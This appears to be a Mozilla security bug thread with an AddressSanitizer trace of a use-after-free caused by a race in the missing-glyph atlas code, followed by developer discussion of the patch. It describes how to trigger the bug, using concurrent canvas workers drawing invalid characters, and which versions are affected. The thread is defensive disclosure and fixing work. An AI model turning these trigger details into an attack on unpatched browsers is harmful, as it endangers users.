    #4 0x7ff9b91ce249 in gfxFont::DrawMissingGlyph /builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp:2202
    #5 0x7ff9b91d8338 in gfxFont::DrawGlyphs<0,0> /builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp:2030
    #6 0x7ff9b91d1e8d in gfxFont::Draw /builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp:2530
    #7 0x7ff9b9293f6a in gfxTextRun::Draw /builds/worker/checkouts/gecko/gfx/thebes/gfxTextRun.cpp:683
    #8 0x7ff9bc86e121 in mozilla::dom::CanvasBidiProcessor::DrawText /builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp:4123
    #9 0x7ff9c11c9b54 in nsBidiPresUtils::ProcessSimpleRun /builds/worker/checkouts/gecko/layout/base/nsBidiPresUtils.cpp:2387
    #10 0x7ff9c11c90ea in nsBidiPresUtils::ProcessText /builds/worker/checkouts/gecko/layout/base/nsBidiPresUtils.cpp:2165
    #11 0x7ff9bc71197c in mozilla::dom::CanvasRenderingContext2D::DrawOrMeasureText /builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp:4448
    #12 0x7ff9bc70f9d9 in mozilla::dom::CanvasRenderingContext2D::FillText /builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp:3860
    #13 0x7ff9baa76ed4 in mozilla::dom::OffscreenCanvasRenderingContext2D_Binding::fillText /builds/worker/workspace/obj-build/dom/bindings/OffscreenCanvasRenderingContext2DBinding.cpp:3904
    #14 0x7ff9bc53b092 in mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions> /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3318
    #15 0x7ff9c73ba9d3 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:553
    #16 0x7ff9c73a5ccc in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3368
    #17 0x7ff9c7391506 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:431
    #18 0x7ff9c73bab0d in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:585
    #19 0x7ff9c73bc9f1 in js::Call /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:652
    #20 0x7ff9c57cbe00 in JS::Call /builds/worker/checkouts/gecko/js/src/vm/CallAndConstruct.cpp:117
    #21 0x7ff9bc09aacd in mozilla::dom::Function::Call /builds/worker/workspace/obj-build/dom/bindings/FunctionBinding.cpp:50
    #22 0x7ff9b9e3cc99 in mozilla::dom::Function::Call<nsCOMPtr<nsIGlobalObject> > /builds/worker/workspace/obj-build/dist/include/mozilla/dom/FunctionBinding.h:71
    #23 0x7ff9b9e3c609 in mozilla::dom::CallbackTimeoutHandler::Call /builds/worker/checkouts/gecko/dom/base/TimeoutHandler.cpp:167
    #24 0x7ff9bfb7886c in mozilla::dom::WorkerPrivate::RunExpiredTimeouts /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:5163
    #25 0x7ff9bfb864eb in mozilla::dom::WorkerRunnable::Run /builds/worker/checkouts/gecko/dom/workers/WorkerRunnable.cpp:377
    #26 0x7ff9b68bed58 in nsTimerImpl::Fire /builds/worker/checkouts/gecko/xpcom/threads/nsTimerImpl.cpp:654
    #27 0x7ff9b685ba48 in nsTimerEvent::Run /builds/worker/checkouts/gecko/xpcom/threads/TimerThread.cpp:469

Thread T26 created by T0 here:
    #0 0x7ff9d5febd62 in __asan_wrap_CreateThread /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_win.cpp:146
    #1 0x7ffa5c84838d in beginthreadex+0x5d (C:\WINDOWS\System32\ucrtbase.dll+0x18002838d)
    #2 0x7ff9d5beebde in _PR_MD_CREATE_THREAD /builds/worker/checkouts/gecko/nsprpub/pr/src/md/windows/w95thred.c:153
    #3 0x7ff9d5c1606e in _PR_NativeCreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:1058
    #4 0x7ff9d5c167e8 in _PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:1184
    #5 0x7ff9d5c0c7ef in PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:1404
    #6 0x7ff9b68722ea in nsThread::Init /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:633
    #7 0x7ff9bfb98ff0 in mozilla::dom::WorkerThread::Create /builds/worker/checkouts/gecko/dom/workers/WorkerThread.cpp:102
    #8 0x7ff9bfafced8 in mozilla::dom::workerinternals::RuntimeService::ScheduleWorker /builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp:1324
    #9 0x7ff9bfafad52 in mozilla::dom::workerinternals::RuntimeService::RegisterWorker /builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp:1206
    #10 0x7ff9bfb5c22f in mozilla::dom::WorkerPrivate::Constructor /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:2652
    #11 0x7ff9bfb19624 in mozilla::dom::Worker::Constructor /builds/worker/checkouts/gecko/dom/workers/Worker.cpp:43
    #12 0x7ff9bb9ded46 in mozilla::dom::Worker_Binding::_constructor /builds/worker/workspace/obj-build/dom/bindings/WorkerBinding.cpp:1173
    #13 0x7ff9c73bdaa0 in InternalConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:700
    #14 0x7ff9c73a5c88 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3353
    #15 0x7ff9c7391506 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:431
    #16 0x7ff9c73bf07a in js::ExecuteKernel /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:818
    #17 0x7ff9c73bf4b0 in js::Execute /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:850
    #18 0x7ff9c57fd0fa in JS_ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:496
    #19 0x7ff9b9d0a167 in mozilla::dom::JSExecutionContext::ExecScript /builds/worker/checkouts/gecko/dom/base/JSExecutionContext.cpp:241
    #20 0x7ff9c01a10e7 in mozilla::dom::ScriptLoader::EvaluateScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2403
    #21 0x7ff9c019f2f4 in mozilla::dom::ScriptLoader::EvaluateScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2207
    #22 0x7ff9c0195f15 in mozilla::dom::ScriptLoader::ProcessRequest /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1857
    #23 0x7ff9c0191440 in mozilla::dom::ScriptLoader::ProcessInlineScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1300
    #24 0x7ff9c017aec3 in mozilla::dom::ScriptLoader::ProcessScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:927
    #25 0x7ff9c0179e26 in mozilla::dom::ScriptElement::MaybeProcessScript /builds/worker/checkouts/gecko/dom/script/ScriptElement.cpp:134
    #26 0x7ff9b87dd28d in nsHtml5TreeOpExecutor::RunScript /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:950
    #27 0x7ff9b87d7361 in nsHtml5TreeOpExecutor::RunFlushLoop /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:741
    #28 0x7ff9b87e4f90 in nsHtml5ExecutorFlusher::Run /builds/worker/checkouts/gecko/parser/html/nsHtml5StreamParser.cpp:174
    #29 0x7ff9b68217d6 in mozilla::SchedulerGroup::Runnable::Run /builds/worker/checkouts/gecko/xpcom/threads/SchedulerGroup.cpp:114
    #30 0x7ff9b6844c83 in mozilla::RunnableTask::Run /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:553
    #31 0x7ff9b682d38c in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:867
    #32 0x7ff9b68297f2 in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:698
    #33 0x7ff9b682a413 in mozilla::TaskController::ProcessPendingMTTask /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:464
    #34 0x7ff9b68481c1 in mozilla::detail::RunnableFunction<`lambda at /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:188:7'>::Run /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:547
    #35 0x7ff9b687857a in nsThread::ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1239
    #36 0x7ff9b6887f5d in NS_ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:477
    #37 0x7ff9b7f30267 in mozilla::ipc::MessagePump::Run /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:85
    #38 0x7ff9b7e47432 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:374
    #39 0x7ff9b7e47207 in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:356
    #40 0x7ff9c06ec81c in nsBaseAppShell::Run /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:148
    #41 0x7ff9c08f779e in nsAppShell::Run /builds/worker/checkouts/gecko/widget/windows/nsAppShell.cpp:614
    #42 0x7ff9c5377ff7 in XRE_RunAppShell /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:738
    #43 0x7ff9b7e47432 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:374
    #44 0x7ff9b7e47207 in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:356
    #45 0x7ff9c537753a in XRE_InitChildProcess /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:673
    #46 0x7ff7e1632c9e in NS_internal_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:353
    #47 0x7ff7e163166e in wmain /builds/worker/checkouts/gecko/toolkit/xre/nsWindowsWMain.cpp:167
    #48 0x7ff7e1725a67 in __scrt_common_main_seh d:\agent\_work\2\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:288
    #49 0x7ffa5dc626bc in BaseThreadInitThunk+0x1c (C:\WINDOWS\System32\KERNEL32.DLL+0x1800126bc)
    #50 0x7ffa5ecca9f7 in RtlUserThreadStart+0x27 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x18005a9f7)

Thread T32 created by T0 here:
    #0 0x7ff9d5febd62 in __asan_wrap_CreateThread /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_win.cpp:146
    #1 0x7ffa5c84838d in beginthreadex+0x5d (C:\WINDOWS\System32\ucrtbase.dll+0x18002838d)
    #2 0x7ff9d5beebde in _PR_MD_CREATE_THREAD /builds/worker/checkouts/gecko/nsprpub/pr/src/md/windows/w95thred.c:153
    #3 0x7ff9d5c1606e in _PR_NativeCreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:1058
    #4 0x7ff9d5c167e8 in _PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:1184
    #5 0x7ff9d5c0c7ef in PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:1404
    #6 0x7ff9b68722ea in nsThread::Init /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:633
    #7 0x7ff9bfb98ff0 in mozilla::dom::WorkerThread::Create /builds/worker/checkouts/gecko/dom/workers/WorkerThread.cpp:102
    #8 0x7ff9bfafced8 in mozilla::dom::workerinternals::RuntimeService::ScheduleWorker /builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp:1324
    #9 0x7ff9bfafad52 in mozilla::dom::workerinternals::RuntimeService::RegisterWorker /builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp:1206
    #10 0x7ff9bfb5c22f in mozilla::dom::WorkerPrivate::Constructor /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:2652
    #11 0x7ff9bfb19624 in mozilla::dom::Worker::Constructor /builds/worker/checkouts/gecko/dom/workers/Worker.cpp:43
    #12 0x7ff9bb9ded46 in mozilla::dom::Worker_Binding::_constructor /builds/worker/workspace/obj-build/dom/bindings/WorkerBinding.cpp:1173
    #13 0x7ff9c73bdaa0 in InternalConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:700
    #14 0x7ff9c73a5c88 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3353
    #15 0x7ff9c7391506 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:431
    #16 0x7ff9c73bf07a in js::ExecuteKernel /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:818
    #17 0x7ff9c73bf4b0 in js::Execute /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:850
    #18 0x7ff9c57fd0fa in JS_ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:496
    #19 0x7ff9b9d0a167 in mozilla::dom::JSExecutionContext::ExecScript /builds/worker/checkouts/gecko/dom/base/JSExecutionContext.cpp:241
    #20 0x7ff9c01a10e7 in mozilla::dom::ScriptLoader::EvaluateScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2403
    #21 0x7ff9c019f2f4 in mozilla::dom::ScriptLoader::EvaluateScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2207
    #22 0x7ff9c0195f15 in mozilla::dom::ScriptLoader::ProcessRequest /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1857
    #23 0x7ff9c0191440 in mozilla::dom::ScriptLoader::ProcessInlineScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1300
    #24 0x7ff9c017aec3 in mozilla::dom::ScriptLoader::ProcessScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:927
    #25 0x7ff9c0179e26 in mozilla::dom::ScriptElement::MaybeProcessScript /builds/worker/checkouts/gecko/dom/script/ScriptElement.cpp:134
    #26 0x7ff9b87dd28d in nsHtml5TreeOpExecutor::RunScript /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:950
    #27 0x7ff9b87d7361 in nsHtml5TreeOpExecutor::RunFlushLoop /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:741
    #28 0x7ff9b87e4f90 in nsHtml5ExecutorFlusher::Run /builds/worker/checkouts/gecko/parser/html/nsHtml5StreamParser.cpp:174
    #29 0x7ff9b68217d6 in mozilla::SchedulerGroup::Runnable::Run /builds/worker/checkouts/gecko/xpcom/threads/SchedulerGroup.cpp:114
    #30 0x7ff9b6844c83 in mozilla::RunnableTask::Run /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:553
    #31 0x7ff9b682d38c in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:867
    #32 0x7ff9b68297f2 in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:698
    #33 0x7ff9b682a413 in mozilla::TaskController::ProcessPendingMTTask /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:464
    #34 0x7ff9b68481c1 in mozilla::detail::RunnableFunction<`lambda at /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:188:7'>::Run /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:547
    #35 0x7ff9b687857a in nsThread::ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1239
    #36 0x7ff9b6887f5d in NS_ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:477
    #37 0x7ff9b7f30267 in mozilla::ipc::MessagePump::Run /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:85
    #38 0x7ff9b7e47432 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:374
    #39 0x7ff9b7e47207 in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:356
    #40 0x7ff9c06ec81c in nsBaseAppShell::Run /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:148
    #41 0x7ff9c08f779e in nsAppShell::Run /builds/worker/checkouts/gecko/widget/windows/nsAppShell.cpp:614
    #42 0x7ff9c5377ff7 in XRE_RunAppShell /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:738
    #43 0x7ff9b7e47432 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:374
    #44 0x7ff9b7e47207 in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:356
    #45 0x7ff9c537753a in XRE_InitChildProcess /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:673
    #46 0x7ff7e1632c9e in NS_internal_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:353
    #47 0x7ff7e163166e in wmain /builds/worker/checkouts/gecko/toolkit/xre/nsWindowsWMain.cpp:167
    #48 0x7ff7e1725a67 in __scrt_common_main_seh d:\agent\_work\2\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:288
    #49 0x7ffa5dc626bc in BaseThreadInitThunk+0x1c (C:\WINDOWS\System32\KERNEL32.DLL+0x1800126bc)
    #50 0x7ffa5ecca9f7 in RtlUserThreadStart+0x27 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x18005a9f7)

Thread T25 created by T0 here:
    #0 0x7ff9d5febd62 in __asan_wrap_CreateThread /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_win.cpp:146
    #1 0x7ffa5c84838d in beginthreadex+0x5d (C:\WINDOWS\System32\ucrtbase.dll+0x18002838d)
    #2 0x7ff9d5beebde in _PR_MD_CREATE_THREAD /builds/worker/checkouts/gecko/nsprpub/pr/src/md/windows/w95thred.c:153
    #3 0x7ff9d5c1606e in _PR_NativeCreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:1058
    #4 0x7ff9d5c167e8 in _PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:1184
    #5 0x7ff9d5c0c7ef in PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:1404
    #6 0x7ff9b68722ea in nsThread::Init /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:633
    #7 0x7ff9bfb98ff0 in mozilla::dom::WorkerThread::Create /builds/worker/checkouts/gecko/dom/workers/WorkerThread.cpp:102
    #8 0x7ff9bfafced8 in mozilla::dom::workerinternals::RuntimeService::ScheduleWorker /builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp:1324
    #9 0x7ff9bfafad52 in mozilla::dom::workerinternals::RuntimeService::RegisterWorker /builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp:1206
    #10 0x7ff9bfb5c22f in mozilla::dom::WorkerPrivate::Constructor /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:2652
    #11 0x7ff9bfb19624 in mozilla::dom::Worker::Constructor /builds/worker/checkouts/gecko/dom/workers/Worker.cpp:43
    #12 0x7ff9bb9ded46 in mozilla::dom::Worker_Binding::_constructor /builds/worker/workspace/obj-build/dom/bindings/WorkerBinding.cpp:1173
    #13 0x7ff9c73bdaa0 in InternalConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:700
    #14 0x7ff9c73a5c88 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3353
    #15 0x7ff9c7391506 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:431
    #16 0x7ff9c73bf07a in js::ExecuteKernel /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:818
    #17 0x7ff9c73bf4b0 in js::Execute /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:850
    #18 0x7ff9c57fd0fa in JS_ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:496
    #19 0x7ff9b9d0a167 in mozilla::dom::JSExecutionContext::ExecScript /builds/worker/checkouts/gecko/dom/base/JSExecutionContext.cpp:241
    #20 0x7ff9c01a10e7 in mozilla::dom::ScriptLoader::EvaluateScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2403
    #21 0x7ff9c019f2f4 in mozilla::dom::ScriptLoader::EvaluateScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2207
    #22 0x7ff9c0195f15 in mozilla::dom::ScriptLoader::ProcessRequest /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1857
    #23 0x7ff9c0191440 in mozilla::dom::ScriptLoader::ProcessInlineScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1300
    #24 0x7ff9c017aec3 in mozilla::dom::ScriptLoader::ProcessScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:927
    #25 0x7ff9c0179e26 in mozilla::dom::ScriptElement::MaybeProcessScript /builds/worker/checkouts/gecko/dom/script/ScriptElement.cpp:134
    #26 0x7ff9b87dd28d in nsHtml5TreeOpExecutor::RunScript /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:950
    #27 0x7ff9b87d7361 in nsHtml5TreeOpExecutor::RunFlushLoop /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:741
    #28 0x7ff9b87e4f90 in nsHtml5ExecutorFlusher::Run /builds/worker/checkouts/gecko/parser/html/nsHtml5StreamParser.cpp:174
    #29 0x7ff9b68217d6 in mozilla::SchedulerGroup::Runnable::Run /builds/worker/checkouts/gecko/xpcom/threads/SchedulerGroup.cpp:114
    #30 0x7ff9b6844c83 in mozilla::RunnableTask::Run /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:553
    #31 0x7ff9b682d38c in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:867
    #32 0x7ff9b68297f2 in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:698
    #33 0x7ff9b682a413 in mozilla::TaskController::ProcessPendingMTTask /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:464
    #34 0x7ff9b68481c1 in mozilla::detail::RunnableFunction<`lambda at /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:188:7'>::Run /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:547
    #35 0x7ff9b687857a in nsThread::ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1239
    #36 0x7ff9b6887f5d in NS_ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:477
    #37 0x7ff9b7f30267 in mozilla::ipc::MessagePump::Run /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:85
    #38 0x7ff9b7e47432 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:374
    #39 0x7ff9b7e47207 in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:356
    #40 0x7ff9c06ec81c in nsBaseAppShell::Run /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:148
    #41 0x7ff9c08f779e in nsAppShell::Run /builds/worker/checkouts/gecko/widget/windows/nsAppShell.cpp:614
    #42 0x7ff9c5377ff7 in XRE_RunAppShell /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:738
    #43 0x7ff9b7e47432 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:374
    #44 0x7ff9b7e47207 in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:356
    #45 0x7ff9c537753a in XRE_InitChildProcess /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:673
    #46 0x7ff7e1632c9e in NS_internal_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:353
    #47 0x7ff7e163166e in wmain /builds/worker/checkouts/gecko/toolkit/xre/nsWindowsWMain.cpp:167
    #48 0x7ff7e1725a67 in __scrt_common_main_seh d:\agent\_work\2\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:288
    #49 0x7ffa5dc626bc in BaseThreadInitThunk+0x1c (C:\WINDOWS\System32\KERNEL32.DLL+0x1800126bc)
    #50 0x7ffa5ecca9f7 in RtlUserThreadStart+0x27 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x18005a9f7)

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/checkouts/gecko/gfx/2d/DrawTargetSkia.cpp:246 in mozilla::gfx::GetSkImageForSurface
Shadow bytes around the buggy address:
  0x04a6adbfd780: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x04a6adbfd790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x04a6adbfd7a0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x04a6adbfd7b0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
  0x04a6adbfd7c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x04a6adbfd7d0: fa fa fa fa fa fa fa fa[fd]fd fd fd fd fd fd fd
  0x04a6adbfd7e0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x04a6adbfd7f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x04a6adbfd800: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x04a6adbfd810: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x04a6adbfd820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==18340==ABORTING
Group: core-security → gfx-core-security
Flags: sec-bounty?

Jonathan, ideas about how to make this thread-safe? Could we conceivably just disable missing glyphs on worker threads and side-step the issue?

Severity: -- → S3
Flags: needinfo?(jfkthame)

(In reply to Lee Salzman [:lsalzman] from comment #2)

Jonathan, ideas about how to make this thread-safe? Could we conceivably just disable missing glyphs on worker threads and side-step the issue?

I guess that'd be possible, though it seems generally bad for us to handle text rendering differently depending whether we're on a worker or the main thread.

Another option may be to consolidate the glyph-atlas globals into a single record, so we just have one global pointer to manage, and then ensure that whatever thread needs to use it can atomically take ownership of that record for the duration of its operation.

I've started to put together a patch to do the latter; let's see if it seems to work without too much pain.

Flags: needinfo?(jfkthame)

How consistent is the test case at reproducing the issue? Generally I would guess that once-per-process races on a single assignment are hard to trigger, but maybe it is so easy to create two DOM workers at the same time that it is easy to hit.

Flags: needinfo?(loobenyang)

(In reply to Andrew McCreight [:mccr8] from comment #4)

How consistent is the test case at reproducing the issue? Generally I would guess that once-per-process races on a single assignment are hard to trigger, but maybe it is so easy to create two DOM workers at the same time that it is easy to hit.

With this PoC on my Windows POC, it's reproduced almost instantly when I run it. If it does not hit, I only need to try one or a couple more times.

Flags: needinfo?(loobenyang)
Attached file tsan.txt
OS: Windows → All
Hardware: Desktop → All

Tyson was able to reproduce it about half of the time, and also reproduce it on Linux. It is interesting to know that a once-per-process race can be triggered so easily sometimes. I suppose the time of the race in this case is very controllable from content. I'll have to keep that in mind in the future.

Summary: GFX - Use After Free in MakeGlyphAtlas() → initialization race leading to use after free in MakeGlyphAtlas()
Component: Graphics: Canvas2D → Graphics: Text

Tyson, would you be able to try the above patch and let me know if this prevents the issue? I haven't reproduced it locally but if I'm understanding it right, I think this should resolve things. Thanks!

Flags: needinfo?(twsmith)
Assignee: nobody → jfkthame
Status: NEW → ASSIGNED

I am still able to reproduce the issue with the patch applied.

Flags: needinfo?(twsmith) → needinfo?(jfkthame)

(In reply to Tyson Smith [:tsmith] from comment #10)

I am still able to reproduce the issue with the patch applied.

Ah, drat. OK, thanks for testing - I'll take another look tomorrow.

Flags: needinfo?(jfkthame)

Oh, wait - looking at your tsan traces, that's a different race than the missing-glyph atlas issue originally reported here. Needs a deeper look.....

Comment on attachment 9324559 [details]
Bug 1823365 - Clean up management of missing-glyph atlas.

Security Approval Request

  • How easily could an exploit be constructed based on the patch?: The patch introduces an atomic, which implies we're concerned about a race/threading issue; and it's in the missing-glyph code, which points to rendering text that contains invalid Unicode values. So it's not a big stretch to get from there to running multiple canvas workers that paint "garbage" characters.

It's unclear to me how one would get beyond a UAF-caused crash (or maybe scrambled rendering) to something actually exploitable, but maybe people more experienced in such things would find a way.

  • Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?: No
  • Which older supported branches are affected by this flaw?: 105 onwards
